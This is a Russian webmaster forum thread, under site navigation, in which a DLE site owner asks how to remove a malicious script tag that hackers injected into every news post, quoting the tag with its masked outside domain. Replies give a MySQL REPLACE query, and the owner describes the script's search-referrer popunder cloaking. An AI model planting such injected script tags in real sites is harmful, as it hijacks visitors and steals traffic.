- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день, камрады!
У меня такая проблема, сайт взломали и во всех новостях повесели вредоносный скрипт такого формата <script language=\"JavaScript\" src=\"http://vi*****d.com/****.js\"></script> он весит в краткой и полной новости.
И у меня соответственно вопрос как его удалить из новостей ?
Как сделать запрос в MySQL чтоб он удалил это скрипт <script language=\"JavaScript\" src=\"http://vi*****d.com/****.js\"></script> из Таблица : dle_post>short_story и соответственно dle_post>full_story
Или есть другой вариант удаления этого гов*а из новостей ?
А вы уверены что оно в базе а не в шаблоне?
p.s. хотя судя по экранированным кавычкам оно таки в базе.
С ДЛЕ не знаком, но из базы обычно удаляется так:
UPDATE `table`
SET `fullstory` = REPLACE(`fullstory`, '<script language="JavaScript" src="http://vi*****d.com/****.js"></script>', '')
ну или с экранированными двойными кавычками, не знаю как у вас там лежит.
Проблема только в полных новостях или везде на сайте ? Вообще смысла вставлять подобное в mysql нет. Скорее всего подвержены файлы .php из /engine/ . За определенную плату смогу помочь решить проблему.
странно, я думал все эти движки без дыр. а чего то хакают всех
С ДЛЕ не знаком, но из базы обычно удаляется так:
UPDATE `table`
SET `fullstory` = REPLACE(`fullstory`, '<script language="JavaScript" src="http://vi*****d.com/****.js"></script>', '')
ну или с экранированными двойными кавычками, не знаю как у вас там лежит.
Не получилось выдало ошибку
P/S: Проблема решена! в обще сделал дамп базы, скачал на комп .sql, открыл в редакторе и заменил вредоностный код на пробел(При 500 новостях на сайте, чел захерачил 5800 этого кода =), в одной новости где-то по 58 повторов кода, по этому ручной режим удаления не канал самого начала = ) ), сохранил. Старую БД удалил, залил новый отредактированый дамп, все работает замечательно ))
polit999 добавил 21.02.2010 в 18:49
странно, я думал все эти движки без дыр. а чего то хакают всех
Нет ничего без дыр ) а чел в обще грамотно хакнул ) я думаю что он руками та и не ломал, а написал скрипт который сканируют ДЛе на баги, после хакает по шаблону известных или своих приват дыр, получая права админа или журналиста, срипт автоматически добавляет во все новости этот код, делаю хуеву тучу повторов этого кода, что убивает ручное удаления при большом количестве новостей.
Да и сам это вредоностный код, хитрожопый, при заходе на сайт ничего не вылазиет, а вот когда заходишь на сайт через поисковик какой нибуть, открываеться попандер, но если снова зайти через поисковик ничего не открываеться, короче скрипт считает куки, ип. и поисковики его не банят еще ) я это заметил не давно тока, взломали та 1.5-2 месяца назад, ну так и не понял че делает скрипт, забил на удаления его ) думал везвредный ) а он вон какой хитрый, короче чел этот заработал на моем траффики минимум 10-15К рупий ) приходиться платить за свою глупасть )
странно, я думал все эти движки без дыр. а чего то хакают всех
Ага .... лицензионные движки почти без дыр, но у нас же все нулледы ставят, а там уже большой простор для вставки всяких бяк.
Да и шаблоны использую по большей части из паблика, не проверяя их потом =)
Пы.Сы. ТС, кинь урл в личку .... посмотрю что там почем =)
Ага .... лицензионные движки почти без дыр, но у нас же все нулледы ставят, а там уже большой простор для вставки всяких бяк.
Да и шаблоны использую по большей части из паблика, не проверяя их потом =)
Все верно, но в моем случае косяк на самом двиге в. 8.2 думаю все тогда столкнулись с этой багой от мало до велико )
Пы.Сы. ТС, кинь урл в личку .... посмотрю что там почем =)
Читай выше, проблема решена! )